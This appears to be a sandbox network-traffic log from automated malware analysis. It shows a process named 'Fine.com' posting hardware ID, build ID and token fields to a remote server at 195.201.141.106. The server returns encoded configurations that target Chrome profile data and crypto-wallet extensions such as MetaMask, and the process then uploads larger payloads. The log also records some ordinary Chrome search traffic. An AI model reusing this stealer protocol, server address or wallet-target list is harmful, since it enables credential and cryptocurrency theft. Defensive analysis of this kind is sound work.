                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          1192.168.2.549860195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:45 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----XBAIMGLN7QIM7YCTJWLN
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:45 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 45 45 46 44 46 46 44 31 41 34 32 39 33 36 30 35 30 34 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 2d 2d 0d
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------XBAIMGLN7QIM7YCTJWLNContent-Disposition: form-data; name="hwid"E0EEFDFFD1A42936050476-a33c7340-61ca------XBAIMGLN7QIM7YCTJWLNContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------XBAIMGLN7QIM7YCTJWLN--
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:45 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:45 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|effb1b070e532a9ec84de75fa450547c|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          2192.168.2.549869195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:46 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----89R1NGVKNGVAAAAAAAAI
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 39 52 31 4e 47 56 4b 4e 47 56 41 41 41 41 41 41 41 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 38 39 52 31 4e 47 56 4b 4e 47 56 41 41 41 41 41 41 41 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 38 39 52 31 4e 47 56 4b 4e 47 56 41 41 41 41 41 41 41 41 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------89R1NGVKNGVAAAAAAAAIContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------89R1NGVKNGVAAAAAAAAIContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------89R1NGVKNGVAAAAAAAAICont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:47 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:47 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          3192.168.2.549880195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:47 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BAI5X4O8YUSRQIW4WL68
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 49 35 58 34 4f 38 59 55 53 52 51 49 57 34 57 4c 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 49 35 58 34 4f 38 59 55 53 52 51 49 57 34 57 4c 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 42 41 49 35 58 34 4f 38 59 55 53 52 51 49 57 34 57 4c 36 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------BAI5X4O8YUSRQIW4WL68Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------BAI5X4O8YUSRQIW4WL68Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------BAI5X4O8YUSRQIW4WL68Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:48 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:48 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          4192.168.2.549890195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:49 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----S0HVS2V3W4E3EUK6P89R
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:49 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------S0HVS2V3W4E3EUK6P89RCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:49 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:49 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          5192.168.2.549902195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:51 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----VS0RQIWB1DJM7YUS0R9Z
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 489
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:51 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 56 53 30 52 51 49 57 42 31 44 4a 4d 37 59 55 53 30 52 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 52 51 49 57 42 31 44 4a 4d 37 59 55 53 30 52 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 52 51 49 57 42 31 44 4a 4d 37 59 55 53 30 52 39 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------VS0RQIWB1DJM7YUS0R9ZContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------VS0RQIWB1DJM7YUS0R9ZContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------VS0RQIWB1DJM7YUS0R9ZCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:52 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          6192.168.2.549901195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:51 UTC183OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----VS0RQIWB1DJM7YUS0R9Z
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 7373
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:51 UTC7373OUTData Raw: 2d 2d 2d 2d 2d 2d 56 53 30 52 51 49 57 42 31 44 4a 4d 37 59 55 53 30 52 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 52 51 49 57 42 31 44 4a 4d 37 59 55 53 30 52 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 52 51 49 57 42 31 44 4a 4d 37 59 55 53 30 52 39 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------VS0RQIWB1DJM7YUS0R9ZContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------VS0RQIWB1DJM7YUS0R9ZContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------VS0RQIWB1DJM7YUS0R9ZCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:52 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          7192.168.2.549925142.250.185.2284435836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC623OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:55 GMT
                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-tyP6l_J03fmAqq85CowdJQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC124INData Raw: 31 30 64 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 75 74 74 65 72 20 67 61 75 74 68 69 65 72 20 70 68 69 6c 61 64 65 6c 70 68 69 61 20 66 6c 79 65 72 73 22 2c 22 6e 79 74 20 73 74 72 61 6e 64 73 20 68 69 6e 74 73 22 2c 22 6e 65 76 61 64 61 20 63 69 76 69 6c 20 66 6f 72 66 65 69 74 75 72 65 20 72 75 6c 69 6e 67 22 2c 22 62 69 74 63 6f 69 6e 20 68 61 72 64 20 64 72 69
                                                                                                                                                                                                                                                                                                                          Data Ascii: 10da)]}'["",["cutter gauthier philadelphia flyers","nyt strands hints","nevada civil forfeiture ruling","bitcoin hard dri
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC1390INData Raw: 76 65 20 6c 61 6e 64 66 69 6c 6c 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 37 20 70 72 6f 20 6d 61 78 22 2c 22 77 69 6e 74 65 72 20 73 74 6f 72 6d 20 63 6f 72 61 20 73 6e 6f 77 66 61 6c 6c 20 74 6f 74 61 6c 73 22 2c 22 72 c5 8d 6b 69 20 73 61 73 61 6b 69 22 2c 22 61 6d 65 72 69 63 61 6e 20 70 72 69 6d 65 76 61 6c 20 6e 65 74 66 6c 69 78 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30
                                                                                                                                                                                                                                                                                                                          Data Ascii: ve landfill","apple iphone 17 pro max","winter storm cora snowfall totals","rki sasaki","american primeval netflix"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u00
